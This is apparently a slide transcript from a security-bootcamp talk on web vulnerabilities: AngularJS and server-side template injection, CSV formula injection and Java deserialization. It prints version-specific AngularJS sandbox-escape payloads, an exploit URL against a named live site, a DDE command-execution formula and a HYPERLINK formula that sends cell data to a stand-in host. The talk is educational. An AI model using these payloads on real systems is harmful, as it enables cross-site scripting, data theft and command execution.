Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
-
Upload
security-bootcamp -
Category
Technology
-
view
711 -
download
2
Transcript of Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Some new vulnerabilities in modern web application
(Part 1)
hkln1 (@anh_npt)
Xin cảm ơn các nhà tài trợ
AngularJS Template Injection (Client-site template injection)
What is AngularJS ?• Popular MVC JavaScript Framework• Maintained and recommended by Google• Read more: • https://docs.angularjs.org/tutorial
What’s risk ? (1)
Not vulnerable
What’s risk ? (2)
???
Four general attack vectors1. Attacking the Sandbox2. Attacking the Sanitizer3. Attacking the CSP Mode4. Attacking the Codebase
The payloads…• 1.0.1 - 1.1.5• {{constructor.constructor('alert(1)')()}}
• 1.2.0 - 1.2.1• {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getP
rototypeOf(a.sub),a).value,0,'alert(1)')()}}
• ….• 1.4.0 - 1.4.9• {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
• 1.5.0-rc2 Fixed
AngularJS injection in the wild (1)• https://hackerone.com/reports/125027
AngularJS injection in the wild (2)• Check: https://developer.uber.com/docs/deeplinking?q=wrtz{{7*7}}• Response: wrtz49 Vulnerable
• Exploit: https://developer.uber.com/docs/deep-linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(_.__proto__,$).value,0,"alert(1)")()}}zzzz
Demo• Piwik
Reference• http://blog.portswigger.net/2016/01/xss-without-html-client-side-te
mplate.html• http://www.slideshare.net/x00mario/an-abusive-relationship-with-an
gularjs
Server-site template injection
What is template engine? (1)• Present dynamic data via web pages and emails.• Separation of presentation (HTML/CSS) from application logic.• Used in wikis, blogs, marketing applications and CMS.• Some template engines:• FreeMarker• Velocity• Smarty• Twig• Jade
What is template engine? (2) <?php echo $param ?> <?php echo htmlspecialchars($var, ENT_QUOTES, ‘UTF-8’) ?>
{{ param }} {{ param | escape}} / {{ param | e}}
What’s risk ?• Not only XSS Remote Code Execution (RCE)• Arbitrary object creation• Arbitrary file read/write• Remote file include• Information disclosure and privilege escalation
Introduction (1)• $output = $twig->render("Dear {first_name},", array("first_name" =>
$user.first_name) ); Not vulnerable
• $output = $twig->render($_GET['custom_email'], array("first_name" => $user.first_name) ); ???
Introduction (2)• custom_email={{7*7}} 49• custom_email={{self}} Object of class
__TwigTemplate_7ae62e582f8a35e5ea6cc639800ecf15b96c0d6f78db3538221c1145580ca4a5 could not be converted to string
Template injection methodology
Detect (1)• Plaintext context
smarty= Hello {user.name}Hello user1
freemarker= Hello ${username}Hello user1
any= <b> Hello </b><b> Hello </b>
smarty= Hello ${7*7}Hello 49
freemarker= Hello ${7*7}Hello 49
Detect (2)• Code context
Personal_greeting = usernameHello user1
Personal_greeting = username<tag>Hello
Personal_greeting = username }} <tag>Hello user01 <tag>
Identify
Exploit• ‘For Template Authors’ - sections covering basic syntax.• ‘Security Considerations’ - chances are whoever developed the app
you're testing didn't read this, and it may contain some useful hints.• Lists of builtin methods, functions, filters, and variables.• Lists of extensions/plugins - some may be enabled by default.
Payloads: Smarty (1)
Payloads: Smarty (2)
Payloads: Smarty (3)
Payloads: Smarty (4)
Payloads: Twig
Payloads: Twig (Sandboxed)
Payloads: Jade
Payloads: FreeMarker
Server-side template injection in the wild
• https://hackerone.com/reports/125980
Demo• Flask/Jinja2• Alfresco
Reference• http://blog.portswigger.net/2015/08/server-side-template-injection.h
tml• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/• https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-pa
rt-ii
Fomular Injection (CSV Injection)
What is CSV Injection ?• Exploit via the export functionality that allow user to download CSV
(Excel) file.• Often contain input from untrusted sources such as survey responses,
transaction details, and user-supplied addresses, …• The attacker can execute any commands on user machine if web
application does not properly validate the contents of the CSV file.
How to test?• =1 + 1 2• -2 + 3 1• +3 + 5 8
The payloads…• =HYPERLINK(https://example.com?test=&A1&A2,”Error: please click
for further information”)
• =DDE(“cmd”;”/C calc”; “DdeLink_60_870516294”)
• =cmd | ‘ /C calc ‘ !A0
CSV Injection in the wild
Demo• Mangento Community
Reference• https://www.owasp.org/index.php/CSV_Excel_Macro_Injection• https://hackerone.com/reports/72785• http://www.contextis.com/resources/blog/comma-separated-vulnera
bilities/
Java deserialization vulnerability
What is serialization ?
What is serialization ? (2)
More complex serialization… (1)
More complex serialization… (2)
Serialization in the context of Java web applications and application
servers• In HTTP requests – Parameters, ViewState, Cookies• RMI – The extensively used Java RMI protocol• RMI over HTTP – Many Java thick client web apps use this• JMX• Custom Protocols
What’s problems ?• What if we knew of an object that implemented a “readObject”
method that did something dangerous ?• What if instead of appending an exclamation point to a user defined
string ?
How to identify wherever an application might be vulnerable ?
Java deserialization vulnerability in the wild• http://artsploit.blogspot.com/2016/01/paypal-rce.html
Analysis of exploiting the real cases – Jboss application (1)
1. Identify
Analysis of exploiting the real cases – Jboss application (2)
1. Exploit
Demo
Analysis of exploiting the real cases – Jenkins
application (1)1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins
application (2)1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins
application (3)1. Vulnerability Detection
Analysis of exploiting the real cases – Jenkins
application (3)2. Exploit Development
Analysis of exploiting the real cases – Jenkins
application (3)2. Exploit Development
Analysis of exploiting the real cases – Jenkins
application (3)2. Exploit Development
Analysis of exploiting the real cases – Jenkins
application (4)2. Exploit Development
Analysis of exploiting the real cases – Jenkinsapplication (5)2. Exploit Development
Demo
Reference• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websph
ere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/• http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pick
les• https://www.youtube.com/watch?v=VviY3O-euVQ